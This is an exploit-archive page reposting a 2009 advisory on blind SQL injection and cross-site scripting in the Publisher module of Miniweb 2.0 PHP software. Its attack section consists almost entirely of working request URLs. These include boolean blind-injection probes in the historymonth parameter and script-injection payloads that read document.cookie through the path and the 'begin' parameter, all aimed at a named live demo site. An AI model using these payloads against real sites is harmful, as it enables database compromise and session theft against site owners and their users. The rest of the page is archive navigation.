Miniweb 2.0 Publisher SQL Injection / XSS

Miniweb 2.0 Publisher SQL Injection / XSS: Posted Jul 29, 2009; Authored by Moudi; The Publisher module for Miniweb version 2.0 suffers from remote blind SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 8461f817f9b8ff904042ee9e060041b928def3477fcb1b54b909bc5479c14224; Download | Favorite | View

Miniweb 2.0 Publisher SQL Injection / XSS

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Miniweb 2.0 Module Publisher (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================

  [»] Script:             [ Miniweb 2.0 ]
  [»] Language:           [ PHP ]
        [»] Download:           [ http://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17  ]
  [»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $250.00 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===  
  
[»] http://www.site.com/patch/index.php?historyyear=2009&historymonth=[BLIND]

[»] http://miniweb2.com/moduledemo/publisher/index.php?historyyear=2009&historymonth=02 and 1=1 <= TRUE
[»] http://miniweb2.com/moduledemo/publisher/index.php?historyyear=2009&historymonth=02 and 1=2 <= FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/index.php/[XSS]
[»] http://www.site.com/patch/index.php?loginaction=1&begin=[XSS]

[»] http://miniweb2.com/moduledemo/publisher/index.php/"><script>alert(document.cookie);</script>
[»] http://miniweb2.com/moduledemo/publisher/index.php?loginaction=1&begin="><script>alert(document.cookie);</script>

Note: have some other XSS on index.php ..

Author: Moudi

###########################################################################

Top Authors In Last 30 Days

Red Hat 285 files
Ubuntu 67 files
Debian 24 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Milad Karimi 5 files
Google Security Research 4 files
tmrswrr 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

Miniweb 2.0 Publisher SQL Injection / XSS

Miniweb 2.0 Publisher SQL Injection / XSS

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Miniweb 2.0 Publisher SQL Injection / XSS

Share This

Miniweb 2.0 Publisher SQL Injection / XSS

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems